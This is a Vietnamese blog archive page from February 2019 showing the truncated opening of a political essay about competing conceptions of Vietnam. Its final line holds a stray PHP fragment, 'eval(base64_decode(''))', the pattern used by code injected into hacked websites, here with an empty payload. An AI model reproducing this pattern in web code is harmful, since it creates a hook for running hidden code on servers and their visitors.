Archive for February 22nd, 2019

VIỆT NAM LÀ VIỆT NAM NÀO?

VIỆT NAM LÀ VIỆT NAM NÀO?

Có ít nhất hai hay ba nước Việt Nam đang tồn tại trong nhận thức hay quan điểm tùy thuộc bạn là ai. Thứ nhất, một “Cộng hòa Xã hội Chủ Nghĩa Việt Nam”, gọi đúng là Cộng Sản Việt Nam. Nước Việt Nam này tồn tại trong

02.22.2019 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>